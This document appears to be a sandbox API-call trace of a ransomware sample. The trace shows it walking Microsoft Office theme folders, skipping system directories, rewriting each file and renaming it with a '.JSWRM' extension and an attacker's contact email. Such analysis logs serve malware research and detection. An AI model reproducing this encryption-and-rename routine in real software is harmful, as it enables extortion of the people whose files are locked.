lpWideCharStr="9A8I36E") returned 8 [0100.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0100.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0100.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0100.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0100.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.598] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Orange.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\orange.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Orange.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\orange.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0100.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0100.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0100.600] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11377f40, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1139e160, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e3, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Paper.xml", cAlternateFileName="")) returned 1 [0100.600] lstrcmpiW (lpString1="Paper.xml", lpString2=".") returned 1 [0100.600] lstrcmpiW (lpString1="Paper.xml", lpString2="..") returned 1 [0100.600] lstrcmpiW (lpString1="Paper.xml", lpString2="...") returned 1 [0100.600] lstrcmpiW (lpString1="Paper.xml", lpString2="windows") returned -1 [0100.600] lstrcmpiW (lpString1="Paper.xml", lpString2="recovery") returned -1 [0100.600] lstrcmpiW (lpString1="Paper.xml", lpString2="perflogs") returned -1 [0100.600] lstrcmpiW (lpString1="Paper.xml", lpString2="documents and settings") returned 1 [0100.600] lstrcmpiW (lpString1="Paper.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.600] lstrcmpiW (lpString1="Paper.xml", lpString2="system volume information") returned -1 [0100.600] lstrcmpiW (lpString1="Paper.xml", lpString2="msocache") returned 1 [0100.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Paper.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Paper.xml", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Paper.xml", lpUsedDefaultChar=0x0) returned 9 [0100.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Paper.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Paper.xml", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Paper.xml", lpUsedDefaultChar=0x0) returned 9 [0100.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0100.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0100.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0100.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Paper.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\paper.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.601] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=739) returned 1 [0100.601] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.601] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.603] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.603] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.603] CloseHandle (hObject=0x314) returned 1 [0100.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0100.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0100.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0100.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0100.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0100.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0100.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.603] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Paper.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\paper.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Paper.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\paper.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0100.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0100.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0100.604] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11377f40, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11377f40, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e8, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Red Orange.xml", cAlternateFileName="REDORA~1.XML")) returned 1 [0100.604] lstrcmpiW (lpString1="Red Orange.xml", lpString2=".") returned 1 [0100.604] lstrcmpiW (lpString1="Red Orange.xml", lpString2="..") returned 1 [0100.604] lstrcmpiW (lpString1="Red Orange.xml", lpString2="...") returned 1 [0100.604] lstrcmpiW (lpString1="Red Orange.xml", lpString2="windows") returned -1 [0100.604] lstrcmpiW (lpString1="Red Orange.xml", lpString2="recovery") returned 1 [0100.605] lstrcmpiW (lpString1="Red Orange.xml", lpString2="perflogs") returned 1 [0100.605] lstrcmpiW (lpString1="Red Orange.xml", lpString2="documents and settings") returned 1 [0100.605] lstrcmpiW (lpString1="Red Orange.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.605] lstrcmpiW (lpString1="Red Orange.xml", lpString2="system volume information") returned -1 [0100.605] lstrcmpiW (lpString1="Red Orange.xml", lpString2="msocache") returned 1 [0100.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0100.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Red Orange.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Red Orange.xml", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Red Orange.xml", lpUsedDefaultChar=0x0) returned 14 [0100.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0100.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0100.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Red Orange.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Red Orange.xml", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Red Orange.xml", lpUsedDefaultChar=0x0) returned 14 [0100.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0100.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0100.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0100.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0100.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Red Orange.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\red orange.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.605] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=744) returned 1 [0100.605] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.606] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.607] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.607] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.607] CloseHandle (hObject=0x314) returned 1 [0100.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0100.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0100.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0100.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0100.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0100.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0100.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.608] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Red Orange.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\red orange.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Red Orange.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\red orange.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0100.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0100.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0100.609] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114108ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114108ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11436ace, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e8, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Red Violet.xml", cAlternateFileName="REDVIO~1.XML")) returned 1 [0100.609] lstrcmpiW (lpString1="Red Violet.xml", lpString2=".") returned 1 [0100.609] lstrcmpiW (lpString1="Red Violet.xml", lpString2="..") returned 1 [0100.609] lstrcmpiW (lpString1="Red Violet.xml", lpString2="...") returned 1 [0100.609] lstrcmpiW (lpString1="Red Violet.xml", lpString2="windows") returned -1 [0100.609] lstrcmpiW (lpString1="Red Violet.xml", lpString2="recovery") returned 1 [0100.609] lstrcmpiW (lpString1="Red Violet.xml", lpString2="perflogs") returned 1 [0100.609] lstrcmpiW (lpString1="Red Violet.xml", lpString2="documents and settings") returned 1 [0100.609] lstrcmpiW (lpString1="Red Violet.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.609] lstrcmpiW (lpString1="Red Violet.xml", lpString2="system volume information") returned -1 [0100.609] lstrcmpiW (lpString1="Red Violet.xml", lpString2="msocache") returned 1 [0100.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0100.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Red Violet.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Red Violet.xml", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Red Violet.xml", lpUsedDefaultChar=0x0) returned 14 [0100.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0100.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Red Violet.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Red Violet.xml", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Red Violet.xml", lpUsedDefaultChar=0x0) returned 14 [0100.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0100.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0100.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0100.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Red Violet.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\red violet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.611] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=744) returned 1 [0100.611] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.611] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.612] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.612] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.613] CloseHandle (hObject=0x314) returned 1 [0100.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0100.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0100.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0100.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0100.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0100.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0100.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.613] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Red Violet.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\red violet.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Red Violet.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\red violet.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0100.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0100.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0100.614] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11377f40, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1139e160, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Red.xml", cAlternateFileName="")) returned 1 [0100.614] lstrcmpiW (lpString1="Red.xml", lpString2=".") returned 1 [0100.614] lstrcmpiW (lpString1="Red.xml", lpString2="..") returned 1 [0100.614] lstrcmpiW (lpString1="Red.xml", lpString2="...") returned 1 [0100.614] 